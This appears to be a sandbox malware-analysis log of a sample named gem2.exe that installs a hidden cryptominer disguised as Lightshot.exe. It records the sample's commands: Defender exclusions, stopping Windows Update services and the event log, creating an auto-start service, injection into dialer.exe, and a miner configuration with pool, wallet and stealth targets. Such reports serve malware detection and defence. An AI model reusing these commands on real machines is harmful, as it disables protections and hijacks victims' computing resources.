Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\Screenshots\Lightshot.exe C:\ProgramData\Screenshots\Lightshot.exe
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\dialer.exe dialer.exe
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GeekBrains"
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GeekBrains"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\ProgramData\Screenshots\Lightshot.exe Process created: C:\Windows\System32\dialer.exe dialer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\gem2.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\dialer.exe Section loaded: ntmarta.dll
Source: C:\ProgramData\Screenshots\Lightshot.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\dialer.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\dialer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\dialer.exe Section loaded: userenv.dll
Source: C:\Windows\System32\dialer.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\dialer.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\dialer.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\dialer.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\dialer.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\dialer.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\dialer.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\dialer.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\dialer.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\dialer.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\dialer.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\dialer.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\dialer.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\dialer.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\dialer.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\dialer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dialer.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\dialer.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\dialer.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dialer.exe Section loaded: amsi.dll
Source: C:\Windows\System32\dialer.exe Section loaded: profapi.dll
Source: C:\Windows\System32\dialer.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dialer.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: gem2.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: gem2.exeStatic file information: File size 2876416 > 1048576
          Source: gem2.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x2b2000
          Source: gem2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: Lightshot.exe, 00000025.00000003.2127811419.000002683F580000.00000004.00000001.00020000.00000000.sdmp
          Source: gem2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: gem2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: gem2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: gem2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: gem2.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Windows\System32\dialer.exe Code function: 65_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 65_2_00000001408460F0
          Source: gem2.exe Static PE information: section name: .00cfg
          Source: Lightshot.exe.0.dr Static PE information: section name: .00cfg
          Source: C:\Users\user\Desktop\gem2.exe Code function: 0_2_00007FF72A7B1394 push qword ptr [00007FF72A7BE004h]; ret 0_2_00007FF72A7B1403
          Source: C:\Windows\System32\winlogon.exe Code function: 29_2_000001E85896ACDD push rcx; retf 003Fh 29_2_000001E85896ACDE
          Source: C:\Windows\System32\winlogon.exe Code function: 29_2_000001E85899C6DD push rcx; retf 003Fh 29_2_000001E85899C6DE
          Source: C:\Windows\System32\winlogon.exe Code function: 29_2_000001E8589CACDD push rcx; retf 003Fh 29_2_000001E8589CACDE
          Source: C:\Windows\System32\lsass.exe Code function: 36_2_00000140ADFDACDD push rcx; retf 003Fh 36_2_00000140ADFDACDE
          Source: C:\Windows\System32\lsass.exe Code function: 36_2_00000140AE87C6DD push rcx; retf 003Fh 36_2_00000140AE87C6DE
          Source: C:\ProgramData\Screenshots\Lightshot.exe Code function: 37_2_00007FF6E4D81394 push qword ptr [00007FF6E4D8E004h]; ret 37_2_00007FF6E4D81403
          Source: C:\Windows\System32\svchost.exe Code function: 40_2_00000195DD5AACDD push rcx; retf 003Fh 40_2_00000195DD5AACDE
          Source: C:\Windows\System32\svchost.exe Code function: 40_2_00000195DD5DC6DD push rcx; retf 003Fh 40_2_00000195DD5DC6DE
          Source: C:\Windows\System32\dwm.exe Code function: 41_2_000001160CBCACDD push rcx; retf 003Fh 41_2_000001160CBCACDE
          Source: C:\Windows\System32\dwm.exe Code function: 41_2_000001160CBFC6DD push rcx; retf 003Fh 41_2_000001160CBFC6DE
          Source: C:\Windows\System32\dialer.exe Code function: 64_2_0000000140001394 push qword ptr [0000000140009004h]; ret 64_2_0000000140001403
          Source: C:\Windows\System32\svchost.exe Code function: 66_2_00000257E108ACDD push rcx; retf 003Fh 66_2_00000257E108ACDE
          Source: C:\Windows\System32\svchost.exe Code function: 66_2_00000257E10BC6DD push rcx; retf 003Fh 66_2_00000257E10BC6DE
          Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001F28C1EACDD push rcx; retf 003Fh 67_2_000001F28C1EACDE
          Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001F28C94C6DD push rcx; retf 003Fh 67_2_000001F28C94C6DE
          Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001CA97FEACDD push rcx; retf 003Fh 68_2_000001CA97FEACDE
          Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001CA9855C6DD push rcx; retf 003Fh 68_2_000001CA9855C6DE
          Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001D2652FACDD push rcx; retf 003Fh 69_2_000001D2652FACDE
          Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001D26532C6DD push rcx; retf 003Fh 69_2_000001D26532C6DE

          Persistence and Installation Behavior

          Source: C:\Windows\System32\lsass.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\ProgramData\Screenshots\Lightshot.exe File created: C:\Windows\TEMP\yycjbdwxjaoe.sys
          Source: C:\ProgramData\Screenshots\Lightshot.exe File created: C:\Windows\Temp\yycjbdwxjaoe.sys
          Source: C:\Users\user\Desktop\gem2.exe File created: C:\ProgramData\Screenshots\Lightshot.exe
          Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

          Hooking and other Techniques for Hiding and Protection

          Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
          Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
          Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: winlogon.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
          Source: C:\Windows\System32\lsass.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

Source: C:\Windows\System32\dialer.exe | Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 23_2_00000001400010C0
Source: C:\Windows\System32\dialer.exe | Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 62_2_00000001400010C0
Source: C:\Windows\System32\dialer.exe | System information queried: FirmwareTableInformation
Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F710000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2438700274.000001DD5F718000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXE
Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F685000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --ALGO=RX/0 --URL=POOL.SUPPORTXMR.COM:80 --USER="46M39DM1DQJFKUNT3T2KIHNU6QQJMRF79J31FSBTBNAFUX9B2GAWYSJLFADQ5MHQR4M6C8JJRFXWLPXDHAPUCRHE3MRBJTW" --PASS="ULTIMA" --CPU-MAX-THREADS-HINT=20 --CINIT-WINRING="YYCJBDWXJAOE.SYS" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.0" --CINIT-IDLE-WAIT=10 --CINIT-IDLE-CPU=80 --CINIT-ID="IKZKMIIBPWTVHLGB"
Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F685000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
